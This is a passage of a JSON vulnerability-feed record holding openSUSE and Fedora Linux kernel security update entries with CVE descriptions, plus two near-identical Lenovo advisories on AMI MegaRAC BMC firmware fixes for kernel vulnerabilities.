kernel allowed local users to obtain sensitive\n information from kernel memory via a large head value.\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-5206: The do_remount function in fs/namespace.c in the Linux\n kernel did not maintain the MNT_LOCK_READONLY bit across a remount of a\n bind mount, which allowed local users to bypass an intended read-only\n restriction and defeat certain sandbox protection mechanisms via a "mount\n -o remount" command within a user namespace.\n\n CVE-2014-5207: fs/namespace.c in the Linux kernel did not properly\n restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which allowed local users\n to gain privileges, interfere with backups and auditing on systems that\n had atime enabled, or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a "mount -o remount"\n command within a user namespace.\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel did not initialize a\n certain data structure, which allowed local users to obtain sensitive\n information from kernel memory by leveraging /dev/media0 read access for a\n MEDIA_IOC_ENUM_ENTITIES ioctl call.\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux\n kernel allowed local users to gain privileges by leveraging data-structure\n differences between an l2tp socket and an inet socket.\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c in\n the Linux kernel, when SCTP authentication is enabled, allowed remote\n attackers to cause a denial of service (NULL pointer dereference and OOPS)\n by starting to establish an association between two endpoints immediately\n after an exchange of INIT and INIT ACK chunks to establish an earlier\n association between these endpoints in the opposite direction.\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel did not properly implement\n the interaction between range notification and hole punching, which\n allowed local users to cause a denial of service (i_mutex hold) by using\n the mmap system call to access a hole, as demonstrated by interfering with\n intended shmem activity by blocking completion of (1) an MADV_REMOVE\n madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call.\n\n Also the following bugs were fixed:\n - KEYS: Fix stale key registration at error path (bnc#908163).\n\n - parport: parport_pc, do not remove parent devices early (bnc#856659).\n\n - xfs: fix directory hash ordering bug.\n - xfs: mark all internal workqueues as freezable (bnc#899785).\n\n - [media] uvc: Fix destruction order in uvc_delete() (bnc#897736).\n\n - cfq-iosched: Fix wrong children_weight calculation (bnc#893429).\n\n - target/rd: Refactor rd_build_device_space + rd_release_device_space\n (bnc#882639).\n\n - Btrfs: Fix memory corruption by ulist_add_merge() on 32bit arch\n (bnc#887046).\n\n - usb: pci-quirks: Prevent Sony VAIO t-series from switching usb ports\n (bnc#864375).\n - xhci: Switch only Intel Lynx Point-LP ports to EHCI on shutdown\n (bnc#864375).\n - xhci: Switch Intel Lynx Point ports to EHCI on shutdown (bnc#864375).\n\n - ALSA: hda - Fix broken PM due to incomplete i915 initialization\n (bnc#890114).\n\n - netbk: Don't destroy the netdev until the vif is shut down (bnc#881008).\n - swiotlb: don't assume PA 0 is invalid (bnc#865882).\n\n - PM / sleep: Fix request_firmware() error at resume (bnc#873790).\n\n - usbcore: don't log on consecutive debounce failures of the same port\n (bnc#818966).\n\n", "edition": 1, "modified": "2014-12-21T13:04:41", "published": "2014-12-21T13:04:41", "id": "OPENSUSE-SU-2014:1677-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00021.html", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4579", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2014-0049", "CVE-2014-0055", "CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0100", "CVE-2014-0101", "CVE-2014-0102", "CVE-2014-0131", "CVE-2014-0155", "CVE-2014-0181", "CVE-2014-0196", "CVE-2014-0206", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1737", "CVE-2014-1738", "CVE-2014-1874", "CVE-2014-2039", "CVE-2014-2309", "CVE-2014-2523", "CVE-2014-2568", "CVE-2014-2580", "CVE-2014-2678", "CVE-2014-2851", "CVE-2014-3122", "CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153", "CVE-2014-3534", "CVE-2014-3917", "CVE-2014-3940", "CVE-2014-4014", "CVE-2014-4171", "CVE-2014-4508", "CVE-2014-4699", "CVE-2014-4715", "CVE-2014-4943", "CVE-2014-5045", "CVE-2014-5077", "CVE-2014-5206", "CVE-2014-5207"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2014-08-16T22:30:46", "published": "2014-08-16T22:30:46", "id": "FEDORA:1835E22100", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: kernel-3.15.10-200.fc20", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0343", "CVE-2013-1059", "CVE-2013-2232", "CVE-2013-2234", "CVE-2013-2888", "CVE-2013-2889", "CVE-2013-2891", "CVE-2013-2892", "CVE-2013-2893", "CVE-2013-2894", "CVE-2013-2895", "CVE-2013-2896", "CVE-2013-2897", "CVE-2013-2899", "CVE-2013-4125", "CVE-2013-4254", "CVE-2013-4343", "CVE-2013-4345", "CVE-2013-4348", "CVE-2013-4350", "CVE-2013-4387", "CVE-2013-4470", "CVE-2013-4563", "CVE-2013-4579", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2013-6378", "CVE-2013-6380", "CVE-2013-6382", "CVE-2013-6405", "CVE-2014-0049", "CVE-2014-0055", "CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0100", "CVE-2014-0101", "CVE-2014-0102", "CVE-2014-0131", "CVE-2014-0155", "CVE-2014-0206", "CVE-2014-1438", "CVE-2014-1446", "CVE-2014-1737", "CVE-2014-1738", "CVE-2014-1874", "CVE-2014-2039", "CVE-2014-2309", "CVE-2014-2523", "CVE-2014-2568", "CVE-2014-2580", "CVE-2014-2678", "CVE-2014-2851", "CVE-2014-3122", "CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153", "CVE-2014-3534", "CVE-2014-3917", "CVE-2014-3940", "CVE-2014-4014", "CVE-2014-4171", "CVE-2014-4508", "CVE-2014-4699", "CVE-2014-4715", "CVE-2014-4943", "CVE-2014-5045", "CVE-2014-5077", "CVE-2014-5206", "CVE-2014-5207"], "description": "The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc. ", "modified": "2014-08-19T07:09:03", "published": "2014-08-19T07:09:03", "id": "FEDORA:2BA602158D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: kernel-3.14.17-100.fc19", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2020-12-13T07:21:46", "bulletinFamily": "info", "cvelist": ["CVE-2018-10882", "CVE-2016-10208", "CVE-2018-10877", "CVE-2016-7097", "CVE-2016-9191", "CVE-2018-13053", "CVE-2016-7910", "CVE-2017-17558", "CVE-2017-15299", "CVE-2018-10880", "CVE-2015-2925", "CVE-2014-9529", "CVE-2018-9568", "CVE-2014-7822", "CVE-2016-6213", "CVE-2015-8215", "CVE-2015-3288", "CVE-2016-3070", "CVE-2014-9420", "CVE-2019-10639", "CVE-2018-1066", "CVE-2019-11478", "CVE-2015-8964", "CVE-2017-7618", "CVE-2016-7916", "CVE-2014-8160", "CVE-2017-9242", "CVE-2015-3339", "CVE-2016-2847", "CVE-2018-10881", "CVE-2019-12819", "CVE-2017-16535", "CVE-2017-5551", "CVE-2015-5706", "CVE-2016-5696", "CVE-2018-5344", "CVE-2017-2671", "CVE-2016-0723", "CVE-2014-9728", "CVE-2014-8989", "CVE-2017-14106", "CVE-2014-9730", "CVE-2019-11190", "CVE-2018-6927", "CVE-2019-13272", "CVE-2018-5995", "CVE-2014-7975", "CVE-2014-5206", "CVE-2016-3156", "CVE-2018-5953", "CVE-2016-0758", "CVE-2014-8559", "CVE-2015-7613", "CVE-2017-7495", "CVE-2017-13305", "CVE-2017-1000253", "CVE-2016-6828", "CVE-2016-0728", "CVE-2017-1000364", "CVE-2019-11833", "CVE-2015-1350", "CVE-2019-11599", "CVE-2019-11477", "CVE-2018-18281", "CVE-2017-18270", "CVE-2014-3631", "CVE-2016-4482", "CVE-2018-1093", "CVE-2017-17449", "CVE-2014-9729", "CVE-2015-3636", "CVE-2018-16884", "CVE-2019-10638", "CVE-2017-5669", "CVE-2018-10883", "CVE-2019-3901", "CVE-2018-17972", "CVE-2016-8405", "CVE-2017-2647", "CVE-2013-4312", "CVE-2015-1333", "CVE-2018-18344", "CVE-2017-16531", "CVE-2018-9422", "CVE-2019-9213", "CVE-2014-5207", "CVE-2015-8816", "CVE-2013-7446", "CVE-2015-4167", "CVE-2018-10087", "CVE-2014-6410", "CVE-2017-7542", "CVE-2014-7145", "CVE-2018-20169", "CVE-2018-10124", "CVE-2016-0823", "CVE-2019-5489", "CVE-2016-7914", "CVE-2018-1092", "CVE-2018-10876", "CVE-2018-1000026", "CVE-2016-8645", "CVE-2019-11479", "CVE-2017-5897", "CVE-2017-8064", "CVE-2018-12896", "CVE-2014-7970", "CVE-2017-17806", "CVE-2015-1805"], "description": "**Lenovo Security Advisory:** LEN-29592\n\n**Potential Impact**: Denial of service, privilege escalation, information disclosure\n\n**Severity:** High\n\n**Scope of Impact:** Industry-wide\n\n**CVE Identifier:** CVE-2013-4312, CVE-2013-7446, CVE-2014-3631, CVE-2014-5206, CVE-2014-5207, CVE-2014-6410, CVE-2014-7145, CVE-2014-7822, CVE-2014-7970, CVE-2014-7975, CVE-2014-8160, CVE-2014-8559, CVE-2014-8989, CVE-2014-9420, CVE-2014-9529, CVE-2014-9728, CVE-2014-9729, CVE-2014-9730, CVE-2015-1333, CVE-2015-1350, CVE-2015-1805, CVE-2015-2925, CVE-2015-3288, CVE-2015-3339, CVE-2015-3636, CVE-2015-4167, CVE-2015-5706, CVE-2015-7613, CVE-2015-8215, CVE-2015-8816, CVE-2015-8964, CVE-2016-0723, CVE-2016-0728, CVE-2016-0758, CVE-2016-0823, CVE-2016-10208, CVE-2016-2847, CVE-2016-3070, CVE-2016-3156, CVE-2016-4482, CVE-2016-5696, CVE-2016-6213, CVE-2016-6828, CVE-2016-7097, CVE-2016-7910, CVE-2016-7914, CVE-2016-7916, CVE-2016-8405, CVE-2016-8645, CVE-2016-9191, CVE-2017-1000253, CVE-2017-1000364, CVE-2017-13305, CVE-2017-14106, CVE-2017-15299, CVE-2017-16531, CVE-2017-16535, CVE-2017-17449, CVE-2017-17558, CVE-2017-17806, CVE-2017-18270, CVE-2017-2647, CVE-2017-2671, CVE-2017-5551, CVE-2017-5669, CVE-2017-5897, CVE-2017-7495, CVE-2017-7542, CVE-2017-7618, CVE-2017-8064, CVE-2017-9242, CVE-2018-1000026, CVE-2018-10087, CVE-2018-10124, CVE-2018-1066, CVE-2018-10876, CVE-2018-10877, CVE-2018-10880, CVE-2018-10881, CVE-2018-10882, CVE-2018-10883, CVE-2018-1092, CVE-2018-1093, CVE-2018-12896, CVE-2018-13053, CVE-2018-16884, CVE-2018-17972, CVE-2018-18281, CVE-2018-18344, CVE-2018-20169, CVE-2018-5344, CVE-2018-5953, CVE-2018-5995, CVE-2018-6927, CVE-2018-9422, CVE-2018-9568, CVE-2019-10638, CVE-2019-10639, CVE-2019-11190, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-11599, CVE-2019-11833, CVE-2019-12819, CVE-2019-13272, CVE-2019-3901, CVE-2019-5489, CVE-2019-9213\n\n**Summary Description: **\n\nAMI has released AMI MegaRAC SP-X Baseboard Management Controller (BMC) security enhancements to address Linux kernel vulnerabilities.\n\n**Mitigation Strategy for Customers (what you should do to protect yourself): **\n\nUpgrade to the BMC firmware version (or newer) indicated for your model in the Product Impact section below.\n\n****\n\n****\n\n**Product Impact:**\n\nTo download the version specified for your product below, follow these steps:\n\n 1. Navigate to your product's Drivers & Software page by going to [https://support.lenovo.com/](<https://pcsupport.lenovo.com/us/en/>). PRC users should go to <https://newsupport.lenovo.com.cn/>\n 2. Search for your product by name or machine type.\n 3. Click Drivers & Software on the left menu panel.\n 4. Click on Manual Update to browse by Component type.\n 5. Compare the minimum fix version for your product from the applicable product table below with the latest version posted on the support site.\n\nAlternatively and if applicable for your product, you may use Lenovo Vantage or Windows Update to update to the latest available version. To confirm you are using the minimum fix version (or higher), go to Add/Remove Programs and check the version listed there.\n", "edition": 11, "modified": "2020-09-17T13:59:41", "published": "2020-04-13T19:22:04", "id": "LENOVO:PS500321-AMI-MEGARAC-SP-X-BMC-VULNERABILITIES-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500321-ami-megarac-sp-x-bmc-vulnerabilities", "title": "AMI MegaRAC SP-X BMC Vulnerabilities - Lenovo Support US", "type": "lenovo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T01:02:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-10882", "CVE-2016-10208", "CVE-2018-10877", "CVE-2016-7097", "CVE-2016-9191", "CVE-2018-13053", "CVE-2016-7910", "CVE-2017-17558", "CVE-2017-15299", "CVE-2018-10880", "CVE-2015-2925", "CVE-2014-9529", "CVE-2018-9568", "CVE-2014-7822", "CVE-2016-6213", "CVE-2015-8215", "CVE-2015-3288", "CVE-2016-3070", "CVE-2014-9420", "CVE-2019-10639", "CVE-2018-1066", "CVE-2019-11478", "CVE-2015-8964", "CVE-2017-7618", "CVE-2016-7916", "CVE-2014-8160", "CVE-2017-9242", "CVE-2015-3339", "CVE-2016-2847", "CVE-2018-10881", "CVE-2019-12819", "CVE-2017-16535", "CVE-2017-5551", "CVE-2015-5706", "CVE-2016-5696", "CVE-2018-5344", "CVE-2017-2671", "CVE-2016-0723", "CVE-2014-9728", "CVE-2014-8989", "CVE-2017-14106", "CVE-2014-9730", "CVE-2019-11190", "CVE-2018-6927", "CVE-2019-13272", "CVE-2018-5995", "CVE-2014-7975", "CVE-2014-5206", "CVE-2016-3156", "CVE-2018-5953", "CVE-2016-0758", "CVE-2014-8559", "CVE-2015-7613", "CVE-2017-7495", "CVE-2017-13305", "CVE-2017-1000253", "CVE-2016-6828", "CVE-2016-0728", "CVE-2017-1000364", "CVE-2019-11833", "CVE-2015-1350", "CVE-2019-11599", "CVE-2019-11477", "CVE-2018-18281", "CVE-2017-18270", "CVE-2014-3631", "CVE-2016-4482", "CVE-2018-1093", "CVE-2017-17449", "CVE-2014-9729", "CVE-2015-3636", "CVE-2018-16884", "CVE-2019-10638", "CVE-2017-5669", "CVE-2018-10883", "CVE-2019-3901", "CVE-2018-17972", "CVE-2016-8405", "CVE-2017-2647", "CVE-2013-4312", "CVE-2015-1333", "CVE-2018-18344", "CVE-2017-16531", "CVE-2018-9422", "CVE-2019-9213", "CVE-2014-5207", "CVE-2015-8816", "CVE-2013-7446", "CVE-2015-4167", "CVE-2018-10087", "CVE-2014-6410", "CVE-2017-7542", "CVE-2014-7145", "CVE-2018-20169", "CVE-2018-10124", "CVE-2016-0823", "CVE-2019-5489", "CVE-2016-7914", "CVE-2018-1092", "CVE-2018-10876", "CVE-2018-1000026", "CVE-2016-8645", "CVE-2019-11479", "CVE-2017-5897", "CVE-2017-8064", "CVE-2018-12896", "CVE-2014-7970", "CVE-2017-17806", "CVE-2015-1805"], "description": "**Lenovo Security Advisory:** LEN-29592\n\n**Potential Impact**: Denial of service, privilege escalation, information disclosure\n\n**Severity:** High\n\n**Scope of Impact:** Industry-wide\n\n**CVE Identifier:** CVE-2013-4312, CVE-2013-7446, CVE-2014-3631, CVE-2014-5206, CVE-2014-5207, CVE-2014-6410, CVE-2014-7145, CVE-2014-7822, CVE-2014-7970, CVE-2014-7975, CVE-2014-8160, CVE-2014-8559, CVE-2014-8989, CVE-2014-9420, CVE-2014-9529, CVE-2014-9728, CVE-2014-9729, CVE-2014-9730, CVE-2015-1333, CVE-2015-1350, CVE-2015-1805, CVE-2015-2925, CVE-2015-3288, CVE-2015-3339, CVE-2015-3636, CVE-2015-4167, CVE-2015-5706, CVE-2015-7613, CVE-2015-8215, CVE-2015-8816, CVE-2015-8964, CVE-2016-0723, CVE-2016-0728, CVE-2016-0758, CVE-2016-0823, CVE-2016-10208, CVE-2016-2847, CVE-2016-3070, CVE-2016-3156, CVE-2016-4482, CVE-2016-5696, CVE-2016-6213, CVE-2016-6828, CVE-2016-7097, CVE-2016-7910, CVE-2016-7914, CVE-2016-7916, CVE-2016-8405, CVE-2016-8645, CVE-2016-9191, CVE-2017-1000253, CVE-2017-1000364, CVE-2017-13305, CVE-2017-14106, CVE-2017-15299, CVE-2017-16531, CVE-2017-16535, CVE-2017-17449, CVE-2017-17558, CVE-2017-17806, CVE-2017-18270, CVE-2017-2647, CVE-2017-2671, CVE-2017-5551, CVE-2017-5669, CVE-2017-5897, CVE-2017-7495, CVE-2017-7542, CVE-2017-7618, CVE-2017-8064, CVE-2017-9242, CVE-2018-1000026, CVE-2018-10087, CVE-2018-10124, CVE-2018-1066, CVE-2018-10876, CVE-2018-10877, CVE-2018-10880, CVE-2018-10881, CVE-2018-10882, CVE-2018-10883, CVE-2018-1092, CVE-2018-1093, CVE-2018-12896, CVE-2018-13053, CVE-2018-16884, CVE-2018-17972, CVE-2018-18281, CVE-2018-18344, CVE-2018-20169, CVE-2018-5344, CVE-2018-5953, CVE-2018-5995, CVE-2018-6927, CVE-2018-9422, CVE-2018-9568, CVE-2019-10638, CVE-2019-10639, CVE-2019-11190, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-11599, CVE-2019-11833, CVE-2019-12819, CVE-2019-13272, CVE-2019-3901, CVE-2019-5489, CVE-2019-9213\n\n**Summary Description: **\n\nAMI has released AMI MegaRAC SP-X Baseboard Management Controller (BMC) security enhancements to address Linux kernel vulnerabilities.\n\n**Mitigation Strategy for Customers (what you should do to protect yourself): **\n\nUpgrade to the BMC firmware version (or newer) indicated for your model in the Product Impact section below.\n\n****\n\n****\n\n**Product Impact:**\n\nTo download the version specified for your product below, follow these steps:\n\n 1. Navigate to your product's Drivers & Software page by going to [https://support.lenovo.com/](<https://pcsupport.lenovo.com/us/en/>). PRC users should go to <https://newsupport.lenovo.com.cn/>\n 2. Search for your product by name or machine type.\n 3. Click Drivers & Software on the left menu panel.\n 4. Click on Manual Update to browse by Component type.\n 5. Compare the minimum fix version for your product from the applicable product table below with the latest version posted on the support site.\n\nAlternatively and if applicable for your product, you may use Lenovo Vantage or Windows Update to update to the latest available version. To confirm you are using the minimum fix version (or higher), go to Add/Remove Programs and check the version listed there.\n", "edition": 43, "modified": "2020-09-17T13:59:41", "published": "2020-04-13T19:22:04", "id": "LENOVO:PS500321-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500321", "title": "AMI MegaRAC SP-X BMC Vulnerabilities - Lenovo Support US", "type": "lenovo", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}